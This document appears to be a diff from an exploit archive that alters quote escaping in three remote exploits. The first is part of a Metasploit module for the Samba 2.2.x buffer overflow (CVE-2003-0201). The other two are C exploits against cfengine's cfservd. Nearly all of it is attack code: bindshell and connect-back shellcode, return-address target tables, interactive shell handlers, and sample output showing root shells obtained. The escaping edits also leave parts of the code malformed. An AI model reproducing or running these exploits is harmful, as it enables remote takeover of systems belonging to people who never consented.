 					This exploits the buffer overflow found in Samba versions
 				2.2.0 to 2.2.8. This particular module is capable of
 				exploiting the flaw on x86 Linux systems that do not
 				have the noexec stack option set.
 			},
-			'Author'         => [ 'hdm', 'jduck' ],
+			\'Author\'         => [ \'hdm\', \'jduck\' ],
-			'License'        => MSF_LICENSE,
+			\'License\'        => MSF_LICENSE,
-			'Version'        => '$Revision: 9552 $',
+			\'Version\'        => \'$Revision: 9552 $\',
-			'References'     =>
+			\'References\'     =>
 				[
-					[ 'CVE', '2003-0201' ],
+					[ \'CVE\', \'2003-0201\' ],
-					[ 'OSVDB', '4469' ],
+					[ \'OSVDB\', \'4469\' ],
-					[ 'BID', '7294' ],
+					[ \'BID\', \'7294\' ],
-					[ 'URL', 'http://seclists.org/bugtraq/2003/Apr/103' ]
+					[ \'URL\', \'http://seclists.org/bugtraq/2003/Apr/103\' ]
 				],
-			'Privileged'     => true,
+			\'Privileged\'     => true,
-			'Payload'        =>
+			\'Payload\'        =>
 				{
-					'Space'    => 1024,
+					\'Space\'    => 1024,
-					'BadChars' => "\x00",
+					\'BadChars\' => \"\\x00\",
-					'MinNops'  => 512,
+					\'MinNops\'  => 512,
-					'StackAdjustment' => -3500
+					\'StackAdjustment\' => -3500
 				},
-			'Platform'       => 'bsd',
+			\'Platform\'       => \'bsd\',
-			'Targets'        =>
+			\'Targets\'        =>
 				[
 					# tested OK - jjd:
 					# FreeBSD 5.0-RELEASE samba-2.2.7a.tbz md5:cc477378829309d9560b136ca11a89f8
-					[ 'Samba 2.2.x - Bruteforce',
+					[ \'Samba 2.2.x - Bruteforce\',
 						{
-							'PtrToNonZero' => 0xbfbffff4, # near the bottom of the stack
+							\'PtrToNonZero\' => 0xbfbffff4, # near the bottom of the stack
-							'Offset'       => 1055,
+							\'Offset\'       => 1055,
-							'Bruteforce'   =>
+							\'Bruteforce\'   =>
 								{
-									'Start' => { 'Ret' => 0xbfbffdfc },
+									\'Start\' => { \'Ret\' => 0xbfbffdfc },
-									'Stop'  => { 'Ret' => 0xbfa00000 },
+									\'Stop\'  => { \'Ret\' => 0xbfa00000 },
-									'Step'  => 256
+									\'Step\'  => 256
 								}
 						}
 					],
 				],
-			'DefaultTarget'  => 0,
+			\'DefaultTarget\'  => 0,
-			'DisclosureDate' => 'Apr 7 2003'
+			\'DisclosureDate\' => \'Apr 7 2003\'
 			))
 		register_options(
@ -74,15 +74,15 @@ class Metasploit3 < Msf::Exploit::Remote
 	def brute_exploit(addrs)
-		curr_ret = addrs['Ret']
+		curr_ret = addrs[\'Ret\']
 		begin
-			print_status("Trying return address 0x%.8x..." %  curr_ret)
+			print_status(\"Trying return address 0x%.8x...\" %  curr_ret)
 			connect
 			smb_login
 			# This value *must* be 1988 to allow findrecv shellcode to work
-			# XXX: I'm not sure the above comment is true...
+			# XXX: I\'m not sure the above comment is true...
 			pattern = rand_text_english(1988)
 			# See the OSX and Solaris versions of this module for additional
@ -90,8 +90,8 @@ class Metasploit3 < Msf::Exploit::Remote
 			# eip_off = 1071 - RH7.2 compiled with -ggdb instead of -O/-O2
 			# (rpmbuild -bp ; edited/reran config.status ; make)
-			eip_off = target['Offset']
+			eip_off = target[\'Offset\']
-			ptr_to_non_zero = target['PtrToNonZero']
+			ptr_to_non_zero = target[\'PtrToNonZero\']
 			# Stuff the shellcode into the request
 			pattern[0, payload.encoded.length] = payload.encoded
@ -102,7 +102,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			# 222       if (IS_IPC(conn)) {
 			# 223          return(ERROR(ERRSRV,ERRaccess));
 			# 224       }
-			pattern[eip_off + 4, 4] = [ptr_to_non_zero - 0x30].pack('V')
+			pattern[eip_off + 4, 4] = [ptr_to_non_zero - 0x30].pack(\'V\')
 			# We want to avoid crashing on the following two derefences.
 			#
@ -110,23 +110,23 @@ class Metasploit3 < Msf::Exploit::Remote
 			# 117     {
 			# 118       int outsize = set_message(outbuf,0,0,True);
 			# 119       int cmd = CVAL(inbuf,smb_com);
-			pattern[eip_off + 8, 4] = [ptr_to_non_zero - 0x08].pack('V')
+			pattern[eip_off + 8, 4] = [ptr_to_non_zero - 0x08].pack(\'V\')
-			pattern[eip_off + 12, 4] = [ptr_to_non_zero - 0x24].pack('V')
+			pattern[eip_off + 12, 4] = [ptr_to_non_zero - 0x24].pack(\'V\')
 			# This stream covers the framepointer and the return address
-			#pattern[1199, 400] = [curr_ret].pack('N') * 100
+			#pattern[1199, 400] = [curr_ret].pack(\'N\') * 100
-			pattern[eip_off, 4] = [curr_ret].pack('V')
+			pattern[eip_off, 4] = [curr_ret].pack(\'V\')
 			trans =
-				"\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00"+
+				\"\\x00\\x04\\x08\\x20\\xff\\x53\\x4d\\x42\\x32\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"+
-				"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"+
+				\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\"+
-				"\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00"+
+				\"\\x64\\x00\\x00\\x00\\x00\\xd0\\x07\\x0c\\x00\\xd0\\x07\\x0c\\x00\\x00\\x00\\x00\"+
-				"\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01"+
+				\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd0\\x07\\x43\\x00\\x0c\\x00\\x14\\x08\\x01\"+
-				"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
+				\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"+
-				"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90"+
+				\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x90\"+
 				pattern
-			# puts "press any key"; $stdin.gets
+			# puts \"press any key\"; $stdin.gets
 			sock.put(trans)
 			handler
@ -134,7 +134,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		rescue EOFError
 		rescue => e
-			print_error("#{e}")
+			print_error(\"#{e}\")
 		end
 	end
--- a/platforms/linux/remote/23182.c
+++ b/platforms/linux/remote/23182.c
@ -4,7 +4,7 @@ cfengine is prone to a stack-based buffer overrun vulnerability. This issue may
 The vulnerability may be exploited to execute arbitrary code with the privileges of cfservd. A denial of service may also be the result of exploitation attempts as cfservd is multi-threaded and may not be configured to restart itself via a super-server such as inetd. 
-/*********************************************************************************\
+/*********************************************************************************\\
 * jsk / cfengine2-2.0.3 from redhat 
@ -16,7 +16,7 @@ The vulnerability may be exploited to execute arbitrary code with the privileges
 * DSR-cfengine.pl :)  i think it has some bugs.maybe it is only public
 * version...... possbile another reasns.....
-* the begin buf of exploit could be like "111111". so....DSR...
+* the begin buf of exploit could be like \"111111\". so....DSR...
 * by jsk from Ph4nt0m Security Team
 * jsk@ph4nt0m.net  chat with us ( irc.0x557.org  #ph4nt0m)
@ -50,7 +50,7 @@ The vulnerability may be exploited to execute arbitrary code with the privileges
-\*********************************************************************************/
+\\*********************************************************************************/
@ -72,7 +72,7 @@ The vulnerability may be exploited to execute arbitrary code with the privileges
 #define D_PORT 5803
-#define D_HOST "www.ph4nt0m.net"
+#define D_HOST \"www.ph4nt0m.net\"
 #define TIMEOUT 10
@ -80,18 +80,18 @@ The vulnerability may be exploited to execute arbitrary code with the privileges
 char shell[]=  /* bindshell(26112)&, netric. */
-        "\x90\x90\x90\x31\xdb\xf7\xe3\x53\x43\x53"
+        \"\\x90\\x90\\x90\\x31\\xdb\\xf7\\xe3\\x53\\x43\\x53\"
-        "\x6a\x02\x89\xe1\xb0\x66\x52"
+        \"\\x6a\\x02\\x89\\xe1\\xb0\\x66\\x52\"
-        "\x50\xcd\x80\x43\x66\x53\x89"
+        \"\\x50\\xcd\\x80\\x43\\x66\\x53\\x89\"
-        "\xe1\x6a\x10\x51\x50\x89\xe1"
+        \"\\xe1\\x6a\\x10\\x51\\x50\\x89\\xe1\"
-        "\x52\x50\xb0\x66\xcd\x80\x89"
+        \"\\x52\\x50\\xb0\\x66\\xcd\\x80\\x89\"
-        "\xe1\xb3\x04\xb0\x66\xcd\x80"
+        \"\\xe1\\xb3\\x04\\xb0\\x66\\xcd\\x80\"
-        "\x43\xb0\x66\xcd\x80\x89\xd9"
+        \"\\x43\\xb0\\x66\\xcd\\x80\\x89\\xd9\"
-        "\x93\xb0\x3f\xcd\x80\x49\x79"
+        \"\\x93\\xb0\\x3f\\xcd\\x80\\x49\\x79\"
-        "\xf9\x52\x68\x6e\x2f\x73\x68"
+        \"\\xf9\\x52\\x68\\x6e\\x2f\\x73\\x68\"
-        "\x68\x2f\x2f\x62\x69\x89\xe3"
+        \"\\x68\\x2f\\x2f\\x62\\x69\\x89\\xe3\"
-        "\x52\x53\x89\xe1\xb0\x0b\xcd"
+        \"\\x52\\x53\\x89\\xe1\\xb0\\x0b\\xcd\"
-        "\x80";
+        \"\\x80\";
 struct op_plat_st
 {
@ -112,15 +112,15 @@ struct op_plat_st __pl_form[]=
-{0,"red 8.0",0x4029cc2c,0},
+{0,\"red 8.0\",0x4029cc2c,0},
-{1,"red 9.0(cmp)",0x4029cda0,0},
+{1,\"red 9.0(cmp)\",0x4029cda0,0},
-{2,"red 7.2 (Compile)",0x44444444,0},
+{2,\"red 7.2 (Compile)\",0x44444444,0},
-{3,"red 7.3 (Compile)",0x44444444,0},
+{3,\"red 7.3 (Compile)\",0x44444444,0},
 NULL
@ -136,17 +136,17 @@ void getshell(char *,unsigned short);
 void printe(char *,short);
-void sig_alarm(){printe("alarm/timeout hit.",1);}
+void sig_alarm(){printe(\"alarm/timeout hit.\",1);}
 void banrl()
 {
-fprintf(stdout,"\n cfengine2-2.0.3:server remote buffer overflow exploit)\n");
+fprintf(stdout,\"\\n cfengine2-2.0.3:server remote buffer overflow exploit)\\n\");
-fprintf(stdout," by jsk.\n");
+fprintf(stdout,\" by jsk.\\n\");
-fprintf(stdout," Greets Br-00t and all #ph4nt0m .\n");
+fprintf(stdout,\" Greets Br-00t and all #ph4nt0m .\\n\");
 }
@ -158,17 +158,17 @@ void x_fp_rm_usage(char *x_fp_rm)
 int __t_xmp=0;
-fprintf(stdout,"\n Usage: %s -[option] [arguments]\n\n",x_fp_rm);
+fprintf(stdout,\"\\n Usage: %s -[option] [arguments]\\n\\n\",x_fp_rm);
-fprintf(stdout,"\t -h [hostname] - target host.\n");
+fprintf(stdout,\"\\t -h [hostname] - target host.\\n\");
-fprintf(stdout,"\t -p [port] - port number.\n");
+fprintf(stdout,\"\\t -p [port] - port number.\\n\");
-fprintf(stdout,"\t -s [addr] - &shellcode address.\n\n");
+fprintf(stdout,\"\\t -s [addr] - &shellcode address.\\n\\n\");
-fprintf(stdout," Example> %s -h target_hostname -p 8000 -t num\n",x_fp_rm);
+fprintf(stdout,\" Example> %s -h target_hostname -p 8000 -t num\\n\",x_fp_rm);
-fprintf(stdout," Select target number>\n\n");
+fprintf(stdout,\" Select target number>\\n\\n\");
 for(;;)
@ -182,7 +182,7 @@ else
 {
-fprintf(stdout,"\t {%d} %s\n",__pl_form[__t_xmp].op_plat_num,__pl_form[__t_xmp].op_plat_sys);
+fprintf(stdout,\"\\t {%d} %s\\n\",__pl_form[__t_xmp].op_plat_num,__pl_form[__t_xmp].op_plat_sys);
 }
@ -190,7 +190,7 @@ __t_xmp++;
 }
-fprintf(stdout,"\n");
+fprintf(stdout,\"\\n\");
 exit(0);
 }
@ -218,7 +218,7 @@ u_long retaddr=__pl_form[type].retaddr;
 (void)banrl();
-while((whlp=getopt(argc,argv,"T:t:H:h:P:p:IiXx"))!=EOF)
+while((whlp=getopt(argc,argv,\"T:t:H:h:P:p:IiXx\"))!=EOF)
 {
@ -228,9 +228,9 @@ switch(whlp)
 {
-case 'T':
+case \'T\':
-case 't':
+case \'t\':
 if((type=atoi(optarg))<6)
@ -248,9 +248,9 @@ break;
-case 'H':
+case \'H\':
-case 'h':
+case \'h\':
 memset((char *)hostname,0,sizeof(hostname));
@ -260,9 +260,9 @@ break;
-case 'P':
+case \'P\':
-case 'p':
+case \'p\':
 port=atoi(optarg);
@ -270,17 +270,17 @@ break;
-case 'I':
+case \'I\':
-case 'i':
+case \'i\':
-fprintf(stderr," Try `%s -?' for more information.\n\n",argv[0]);
+fprintf(stderr,\" Try `%s -?\' for more information.\\n\\n\",argv[0]);
 exit(-1);
-case '?':
+case \'?\':
 (void)x_fp_rm_usage(argv[0]);
@ -302,35 +302,35 @@ if(!strcmp(hostname,D_HOST))
 {
-fprintf(stdout," [+] Hostname: %s\n",hostname);
+fprintf(stdout,\" [+] Hostname: %s\\n\",hostname);
-fprintf(stdout," [+] Port num: %d\n",port);
+fprintf(stdout,\" [+] Port num: %d\\n\",port);
-fprintf(stdout," [+] Retaddr address: %p\n",retaddr);
+fprintf(stdout,\" [+] Retaddr address: %p\\n\",retaddr);
 }
-fprintf(stdout," [1] #1 Set  codes.\n");
+fprintf(stdout,\" [1] #1 Set  codes.\\n\");
 if(!(buf=(char *)malloc(BUFSIZE+1)))
-  printe("getcode(): allocating memory failed.",1);
+  printe(\"getcode(): allocating memory failed.\",1);
  memset(buf, 0x90, BUFSIZE);
-  buf[0] = '1';
+  buf[0] = \'1\';
-  buf[1] = '1';
+  buf[1] = \'1\';
-  buf[2] = '1';
+  buf[2] = \'1\';
-  buf[3] = '1';
+  buf[3] = \'1\';
-  buf[4] = '1';
+  buf[4] = \'1\';
-  buf[5] = '1';
+  buf[5] = \'1\';
-  buf[6] = '1';
+  buf[6] = \'1\';
  memset(buf+7,0x90,636); 
@ -354,17 +354,17 @@ fprintf(stdout," [1] #1 Set  codes.\n");
  memcpy(&buf[BUFSIZE-(9*sizeof(retaddr))], &retaddr, sizeof(retaddr));
- fprintf(stdout," [1] #1 Set socket.\n");
+ fprintf(stdout,\" [1] #1 Set socket.\\n\");
 sd=sock_connect(hostname,port);
-fprintf(stdout," [1] #1 Send codes.\n");
+fprintf(stdout,\" [1] #1 Send codes.\\n\");
 write(sd,buf,BUFSIZE);
 close(sd);
 sleep(1);
-fprintf(stdout," [1] #3 Get shell.\n");
+fprintf(stdout,\" [1] #3 Get shell.\\n\");
 getshell(hostname,26112);
 exit(0);
@ -386,13 +386,13 @@ unsigned short port){
 s.sin_port=htons(port);
- printf("[*] attempting to connect: %s:%d.\n",hostname,port);
+ printf(\"[*] attempting to connect: %s:%d.\\n\",hostname,port);
 if((s.sin_addr.s_addr=inet_addr(hostname))){
  if(!(t=gethostbyname(hostname)))
-   printe("couldn't resolve hostname.",1);
+   printe(\"couldn\'t resolve hostname.\",1);
  memcpy((char*)&s.sin_addr,(char*)t->h_addr,
@ -406,11 +406,11 @@ unsigned short port){
 if(connect(sock,(struct sockaddr *)&s,sizeof(s)))
-  printe("netris connection failed.",1);
+  printe(\"netris connection failed.\",1);
 alarm(0);
- printf("[*] successfully connected: %s:%d.\n",hostname,port);
+ printf(\"[*] successfully connected: %s:%d.\\n\",hostname,port);
 return(sock);
@ -428,11 +428,11 @@ void getshell(char *hostname,unsigned short port){
 struct sockaddr_in sa;
- printf("[*] checking to see if the exploit was successful.\n");
+ printf(\"[*] checking to see if the exploit was successful.\\n\");
 if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
-  printe("getshell(): socket() failed.",1);
+  printe(\"getshell(): socket() failed.\",1);
 sa.sin_family=AF_INET;
@ -440,7 +440,7 @@ void getshell(char *hostname,unsigned short port){
  if(!(he=gethostbyname(hostname)))
-   printe("getshell(): couldn't resolve.",1);
+   printe(\"getshell(): couldn\'t resolve.\",1);
  memcpy((char *)&sa.sin_addr,(char *)he->h_addr,
@ -454,11 +454,11 @@ void getshell(char *hostname,unsigned short port){
 alarm(TIMEOUT);
- printf("[*] attempting to connect: %s:%d.\n",hostname,port);
+ printf(\"[*] attempting to connect: %s:%d.\\n\",hostname,port);
 if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))){
-  printf("[!] connection failed: %s:%d.\n",hostname,port);
+  printf(\"[!] connection failed: %s:%d.\\n\",hostname,port);
  return;
@ -466,11 +466,11 @@ void getshell(char *hostname,unsigned short port){
 alarm(0);
- printf("[*] successfully connected: %s:%d.\n\n",hostname,port);
+ printf(\"[*] successfully connected: %s:%d.\\n\\n\",hostname,port);
 signal(SIGINT,SIG_IGN);
- write(sock,"uname -a;id\n",13);
+ write(sock,\"uname -a;id\\n\",13);
 while(1){
@ -482,17 +482,17 @@ void getshell(char *hostname,unsigned short port){
  if(select(sock+1,&fds,0,0,0)<1)
-   printe("getshell(): select() failed.",1);
+   printe(\"getshell(): select() failed.\",1);
  if(FD_ISSET(0,&fds)){
   if((r=read(0,buf,4096))<1)
-    printe("getshell(): read() failed.",1);
+    printe(\"getshell(): read() failed.\",1);
   if(write(sock,buf,r)!=r)
-    printe("getshell(): write() failed.",1);
+    printe(\"getshell(): write() failed.\",1);
  }
@ -516,9 +516,9 @@ void getshell(char *hostname,unsigned short port){
 void printe(char *err,short e){
- fprintf(stdout," [-] Failed.\n\n");
+ fprintf(stdout,\" [-] Failed.\\n\\n\");
- fprintf(stdout," Happy Exploit ! :-)\n\n");
+ fprintf(stdout,\" Happy Exploit ! :-)\\n\\n\");
--- a/platforms/linux/remote/23183.c
+++ b/platforms/linux/remote/23183.c
@ -10,11 +10,11 @@ The vulnerability may be exploited to execute arbitrary code with the privileges
 *  Date: 4 November 2003                                        *
 *                                                               *
 *  Yet another version.. no big deal.. nothing special..        *
- *  just an extra built-in support for 'connect-back' shell..    *
+ *  just an extra built-in support for \'connect-back\' shell..    *
- *  so that I dun need 'nc -l -p 31337' stuffs... duh !?!        *
+ *  so that I dun need \'nc -l -p 31337\' stuffs... duh !?!        *
 *                                                               *
 *  Anyway.. credit should go to Nick Cleaton who disovered      *
- *  this nice little 'bug'... ;)                                 *
+ *  this nice little \'bug\'... ;)                                 *
 *                                                               *
 *  As usual, use it at your very own risk...                    *
 *  But then again, I really doubt this code will work for you   *
@ -48,11 +48,11 @@ Transaction Receive [88888][]
 RecvSocketStream(8888)
    (Concatenated 4192 from stream)
 Transmission empty...
-Received: ['\x90'......1???QQQ?f????PPfha,fS?SRQ???1??
+Received: [\'\\x90\'......1???QQQ?f????PPfha,fS?SRQ???1??
 1??1?R?f?????0?1??PW?f?????9?@1	?1????1???
 1???1?h//shh/bin?PS??1??1	?? on socket -1869574000
 Transaction Send[t 20][Packed text]
-cfservd: Couldn't send
+cfservd: Couldn\'t send
 cfservd: send
 cfservd: Closing connection
@ -68,7 +68,7 @@ Cfservd Remote Exploit by snooq [ jinyean@hotmail.com ]
 Tested to work against cfservd 2.0.7 on Redhat 8.0
 -> Using return address of 0x4029eeff
-> 'Connecting' mode...
+-> \'Connecting\' mode...
 -> Exploit string sent. Waiting for a shell...
 -> Connecting to shell at 192.168.1.1:24876
 uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),
@ -89,7 +89,7 @@ Cfservd Remote Exploit by snooq [ jinyean@hotmail.com ]
 Tested to work against cfservd 2.0.7 on Redhat 8.0
 -> Using return address of 0x4029eeff
-> 'Listening' mode...( port: 24876 )
+-> \'Listening\' mode...( port: 24876 )
 -> Exploit string sent....
 -> Waiting for connection....
 -> Connection from: 192.168.1.1
@ -132,61 +132,61 @@ exit
 #define SC_SIZE_1	sizeof(bindport)
 #define SC_SIZE_2	sizeof(connback)
-#define CMD		"/usr/bin/id\n"
+#define CMD		\"/usr/bin/id\\n\"
 /* 
- *  Shellcode were shamelessly ripped from netric's code... =p
+ *  Shellcode were shamelessly ripped from netric\'s code... =p
 */
 char bindport[]=
-	"\x31\xc0\x31\xdb\x31\xc9\x51\xb1"
+	\"\\x31\\xc0\\x31\\xdb\\x31\\xc9\\x51\\xb1\"
-	"\x06\x51\xb1\x01\x51\xb1\x02\x51"
+	\"\\x06\\x51\\xb1\\x01\\x51\\xb1\\x02\\x51\"
-	"\x89\xe1\xb3\x01\xb0\x66\xcd\x80"
+	\"\\x89\\xe1\\xb3\\x01\\xb0\\x66\\xcd\\x80\"
-	"\x89\xc1\x31\xc0\x31\xdb\x50\x50"
+	\"\\x89\\xc1\\x31\\xc0\\x31\\xdb\\x50\\x50\"
-	"\x50\x66\x68\x61\x2c\xb3\x02\x66"
+	\"\\x50\\x66\\x68\\x61\\x2c\\xb3\\x02\\x66\"
-	"\x53\x89\xe2\xb3\x10\x53\xb3\x02"
+	\"\\x53\\x89\\xe2\\xb3\\x10\\x53\\xb3\\x02\"
-	"\x52\x51\x89\xca\x89\xe1\xb0\x66"
+	\"\\x52\\x51\\x89\\xca\\x89\\xe1\\xb0\\x66\"
-	"\xcd\x80\x31\xdb\x39\xc3\x74\x05"
+	\"\\xcd\\x80\\x31\\xdb\\x39\\xc3\\x74\\x05\"
-	"\x31\xc0\x40\xcd\x80\x31\xc0\x50"
+	\"\\x31\\xc0\\x40\\xcd\\x80\\x31\\xc0\\x50\"
-	"\x52\x89\xe1\xb3\x04\xb0\x66\xcd"
+	\"\\x52\\x89\\xe1\\xb3\\x04\\xb0\\x66\\xcd\"
-	"\x80\x89\xd7\x31\xc0\x31\xdb\x31"
+	\"\\x80\\x89\\xd7\\x31\\xc0\\x31\\xdb\\x31\"
-	"\xc9\xb3\x11\xb1\x01\xb0\x30\xcd"
+	\"\\xc9\\xb3\\x11\\xb1\\x01\\xb0\\x30\\xcd\"
-	"\x80\x31\xc0\x31\xdb\x50\x50\x57"
+	\"\\x80\\x31\\xc0\\x31\\xdb\\x50\\x50\\x57\"
-	"\x89\xe1\xb3\x05\xb0\x66\xcd\x80"
+	\"\\x89\\xe1\\xb3\\x05\\xb0\\x66\\xcd\\x80\"
-	"\x89\xc6\x31\xc0\x31\xdb\xb0\x02"
+	\"\\x89\\xc6\\x31\\xc0\\x31\\xdb\\xb0\\x02\"
-	"\xcd\x80\x39\xc3\x75\x40\x31\xc0"
+	\"\\xcd\\x80\\x39\\xc3\\x75\\x40\\x31\\xc0\"
-	"\x89\xfb\xb0\x06\xcd\x80\x31\xc0"
+	\"\\x89\\xfb\\xb0\\x06\\xcd\\x80\\x31\\xc0\"
-	"\x31\xc9\x89\xf3\xb0\x3f\xcd\x80"
+	\"\\x31\\xc9\\x89\\xf3\\xb0\\x3f\\xcd\\x80\"
-	"\x31\xc0\x41\xb0\x3f\xcd\x80\x31"
+	\"\\x31\\xc0\\x41\\xb0\\x3f\\xcd\\x80\\x31\"
-	"\xc0\x41\xb0\x3f\xcd\x80\x31\xc0"
+	\"\\xc0\\x41\\xb0\\x3f\\xcd\\x80\\x31\\xc0\"
-	"\x50\x68\x2f\x2f\x73\x68\x68\x2f"
+	\"\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\"
-	"\x62\x69\x6e\x89\xe3\x8b\x54\x24"
+	\"\\x62\\x69\\x6e\\x89\\xe3\\x8b\\x54\\x24\"
-	"\x08\x50\x53\x89\xe1\xb0\x0b\xcd"
+	\"\\x08\\x50\\x53\\x89\\xe1\\xb0\\x0b\\xcd\"
-	"\x80\x31\xc0\x40\xcd\x80\x31\xc0"
+	\"\\x80\\x31\\xc0\\x40\\xcd\\x80\\x31\\xc0\"
-	"\x89\xf3\xb0\x06\xcd\x80\xeb\x99";
+	\"\\x89\\xf3\\xb0\\x06\\xcd\\x80\\xeb\\x99\";
 char connback[]=
-	"\x31\xc0\x31\xdb\x31\xc9\x51\xb1"
+	\"\\x31\\xc0\\x31\\xdb\\x31\\xc9\\x51\\xb1\"
-	"\x06\x51\xb1\x01\x51\xb1\x02\x51"
+	\"\\x06\\x51\\xb1\\x01\\x51\\xb1\\x02\\x51\"
-	"\x89\xe1\xb3\x01\xb0\x66\xcd\x80"
+	\"\\x89\\xe1\\xb3\\x01\\xb0\\x66\\xcd\\x80\"
-	"\x89\xc2\x31\xc0\x31\xc9\x51\x51"
+	\"\\x89\\xc2\\x31\\xc0\\x31\\xc9\\x51\\x51\"
-	"\x68\x41\x42\x43\x44\x66\x68\xb0"
+	\"\\x68\\x41\\x42\\x43\\x44\\x66\\x68\\xb0\"
-	"\xef\xb1\x02\x66\x51\x89\xe7\xb3"
+	\"\\xef\\xb1\\x02\\x66\\x51\\x89\\xe7\\xb3\"
-	"\x10\x53\x57\x52\x89\xe1\xb3\x03"
+	\"\\x10\\x53\\x57\\x52\\x89\\xe1\\xb3\\x03\"
-	"\xb0\x66\xcd\x80\x31\xc9\x39\xc1"
+	\"\\xb0\\x66\\xcd\\x80\\x31\\xc9\\x39\\xc1\"
-	"\x74\x06\x31\xc0\xb0\x01\xcd\x80"
+	\"\\x74\\x06\\x31\\xc0\\xb0\\x01\\xcd\\x80\"
-	"\x31\xc0\xb0\x3f\x89\xd3\xcd\x80"
+	\"\\x31\\xc0\\xb0\\x3f\\x89\\xd3\\xcd\\x80\"
-	"\x31\xc0\xb0\x3f\x89\xd3\xb1\x01"
+	\"\\x31\\xc0\\xb0\\x3f\\x89\\xd3\\xb1\\x01\"
-	"\xcd\x80\x31\xc0\xb0\x3f\x89\xd3"
+	\"\\xcd\\x80\\x31\\xc0\\xb0\\x3f\\x89\\xd3\"
-	"\xb1\x02\xcd\x80\x31\xc0\x31\xd2"
+	\"\\xb1\\x02\\xcd\\x80\\x31\\xc0\\x31\\xd2\"
-	"\x50\x68\x6e\x2f\x73\x68\x68\x2f"
+	\"\\x50\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\"
-	"\x2f\x62\x69\x89\xe3\x50\x53\x89"
+	\"\\x2f\\x62\\x69\\x89\\xe3\\x50\\x53\\x89\"
-	"\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0"
+	\"\\xe1\\xb0\\x0b\\xcd\\x80\\x31\\xc0\\xb0\"
-	"\x01\xcd\x80";
+	\"\\x01\\xcd\\x80\";
 /*
 *  Ugly select() stuffs....
- *  Modified (a little) from TESO's code.. 
+ *  Modified (a little) from TESO\'s code.. 
 *  to support connect back shell.... ;)
 */
@ -206,7 +206,7 @@ void doshell(int sock) {
 		if (FD_ISSET (0, &rfds)) {
                        l = read (0, buf, sizeof (buf));
                        if (l <= 0) {
-                                fprintf(stdout,"-> Connection closed by local user\n");
+                                fprintf(stdout,\"-> Connection closed by local user\\n\");
                                exit (EXIT_FAILURE);
                        }
 			sent=0;
@ -222,10 +222,10 @@ void doshell(int sock) {
                if (FD_ISSET (sock, &rfds)) {
                        l = read (sock, buf, sizeof (buf));
                        if (l == 0) {
-                                fprintf(stdout,"-> Connection closed by remote host.\n");
+                                fprintf(stdout,\"-> Connection closed by remote host.\\n\");
                                exit (EXIT_FAILURE);
                        } else if (l < 0) {
-                                fprintf(stdout,"-> read() error\n");
+                                fprintf(stdout,\"-> read() error\\n\");
                                exit (EXIT_FAILURE);
                        }
                        write (1, buf, l);
@ -255,38 +255,38 @@ void changeport(char *code, int port, int offset) {
 void sendcmd(int sock) {
 	if (send(sock,CMD,strlen(CMD),0)<0) {
-		err_exit("-> send() error");
+		err_exit(\"-> send() error\");
 	}
 }
 void usage(char *s) {
-	fprintf(stdout,"\nUsage: %s [-options]\n\n",s);
+	fprintf(stdout,\"\\nUsage: %s [-options]\\n\\n\",s);
-	fprintf(stdout,"\t-r\tSize of 'return addresses'\n");
+	fprintf(stdout,\"\\t-r\\tSize of \'return addresses\'\\n\");
-	fprintf(stdout,"\t-b\tThe overall size of the buffer\n");
+	fprintf(stdout,\"\\t-b\\tThe overall size of the buffer\\n\");
-	fprintf(stdout,"\t-a\tAlignment size [0~3]\n");
+	fprintf(stdout,\"\\t-a\\tAlignment size [0~3]\\n\");
-	fprintf(stdout,"\t-t\tTarget's port\n");
+	fprintf(stdout,\"\\t-t\\tTarget\'s port\\n\");
-	fprintf(stdout,"\t-s\tPort to bind shell to (in 'connecting' mode), or\n");
+	fprintf(stdout,\"\\t-s\\tPort to bind shell to (in \'connecting\' mode), or\\n\");
-	fprintf(stdout,"\t\tPort for shell to connect back (in 'listening' mode)\n");
+	fprintf(stdout,\"\\t\\tPort for shell to connect back (in \'listening\' mode)\\n\");
-	fprintf(stdout,"\t-o\tOffset from the default return address\n");
+	fprintf(stdout,\"\\t-o\\tOffset from the default return address\\n\");
-	fprintf(stdout,"\t-h\tTarget's IP\n");
+	fprintf(stdout,\"\\t-h\\tTarget\'s IP\\n\");
-	fprintf(stdout,"\t-l\tListening for shell connecting\n");
+	fprintf(stdout,\"\\t-l\\tListening for shell connecting\\n\");
-	fprintf(stdout,"\t\tback to port specified by '-s' switch\n");
+	fprintf(stdout,\"\\t\\tback to port specified by \'-s\' switch\\n\");
-	fprintf(stdout,"\t-i\tIP for shell to connect back\n");
+	fprintf(stdout,\"\\t-i\\tIP for shell to connect back\\n\");
-	fprintf(stdout,"\t-T\tNumber of seconds to wait for connection\n\n");
+	fprintf(stdout,\"\\t-T\\tNumber of seconds to wait for connection\\n\\n\");
-	fprintf(stdout,"\tNotes:\n\t======\n\t'-h' is mandatory\n");
+	fprintf(stdout,\"\\tNotes:\\n\\t======\\n\\t\'-h\' is mandatory\\n\");
-	fprintf(stdout,"\t'-i' is mandatory if '-l' is specified\n\n");
+	fprintf(stdout,\"\\t\'-i\' is mandatory if \'-l\' is specified\\n\\n\");
 	exit(0);
 }
 void sigalrm() {
-	fprintf(stdout,"-> Nope.. I ain't waiting any longer.. =p\n");
